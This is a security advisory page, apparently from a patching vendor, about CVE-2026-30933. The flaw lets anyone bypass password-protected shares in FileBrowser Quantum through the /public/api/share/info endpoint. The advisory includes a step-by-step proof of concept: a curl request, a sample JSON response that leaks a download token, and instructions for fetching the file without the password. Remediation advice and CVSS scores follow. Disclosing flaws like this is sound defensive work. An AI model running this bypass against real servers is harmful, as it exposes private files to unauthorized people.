Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

CVE-2026-30933

FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info
Back to all
CVE

CVE-2026-30933

FileBrowser Quantum: Password-Protected Share Bypass via /public/api/share/info

Summary

The remediation for CVE-2026-27611 appears incomplete.  Password protected shares still disclose tokenized downloadURL via /public/api/share/info in docker image gtstef/filebrowser:1.3.1-webdav-2.  

Details

The issue stems from two flaws:

  1. Tokenized download URLs are written into the persistent share model
backend/http/share.go
convertToFrontendShareResponse(line 63)
s.DownloadURL = getShareURL(r, s.Hash, true, s.Token)
  1. The public endpoint:
GET /public/api/share/info
returns shareLink.CommonShare without clearing DownloadURL.

Since Token is set for password-protected shares, and getShareURL(..., true, token) embeds it as a query parameter, the public API discloses a valid bearer download capability.

The previous patch removed token generation in one handler but did not address the persisted DownloadURL values/Public reflection of existing DownloadURL

PoC

  1. Create a password protected share as an authenticated user 
  2. Copy the public share URL (the clipboard WITHOUT an arrow)  

    http://yourdomain/public/share/yoursharedhash  

    Example:   

    http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw  

  1. Query the public share endpoint via curl request:  

curl 'http://yourdomain/public/api/share/info?hash=(your-share-hash)' -H 'Accept: /'    

Example:  

curl 'http://yourdomain/public/api/share/info?hash=2EBGbXgXg5dpw-nK0RG6vw' -H 'Accept: /'    

  

    Response includes:

    ```

    {

        "shareTheme": "default",

        "title": "Shared files - test.md",

        "description": "A share has been sent to you to view or download.",

        "disableSidebar": false,

        "downloadURL": "http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw\u0026token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D",

        "shareURL": "http://yourdomain/public/share/2EBGbXgXg5dpw-nK0RG6vw",

        "enforceDarkLightMode": "default",

        "viewMode": "normal",

        "shareType": "normal",

        "sidebarLinks": [

            {

                "name": "Share QR Code and Info",

                "category": "shareInfo",

                "target": "#",

                "icon": "qr_code"

            },

            {

                "name": "Download",

                "category": "download",

                "target": "#",

                "icon": "download"

            },

            {

                "name": "sourceLocation",

                "category": "custom",

                "target": "/srv/test.md",

                "icon": ""

            }

        ],

        "hasPassword": true,

        "disableLoginOption": false,

        "sourceURL": "/srv/test.md"

    }

    ```

Note the response "hasPassword": true and downloadURL includes token= parameter

  1. Take the downloadURL(seen in json data response) and replace \u0026 with & and paste link into Incognito or private browser to ensure cookies are not interfering  

Example:

http://yourdomain/public/api/resources/download?hash=2EBGbXgXg5dpw-nK0RG6vw&token=EGGYjfyMgqlqknDAIjXekI3DXJ40Nxht.5-q3gnZVbeJ1KYTc-gLb04N6smp-AH2-d4AUFLXgQ6I%3D

Browser downloads file immediately without requiring password

Impact 

An unauthenticated attacker can retrieve password protected shared files without the password.

Results in authentication bypass, unauthorized file access and confidentiality compromise

Recommended Remediation

Sanitize DownloadURL in public share info responses via commonShare.DownloadURL = "" before returning the json response in shareInfoHandler method located in backend/share.go

Structural fix, only generate tokenized URLs after successful password validation

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
7.5
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
C
H
U
-

Related Resources

No items found.

References

https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-525j-95gf-766f, https://nvd.nist.gov/vuln/detail/CVE-2026-30933, https://github.com/gtsteffaniak/filebrowser, https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.2.2-stable, https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.3.1-beta

Severity

7.5

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
7.5
EPSS Probability
0.00102%
EPSS Percentile
0.27625%
Introduced Version
0
Fix Available
0.0.0-20260307130210-09713b32a5f6

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading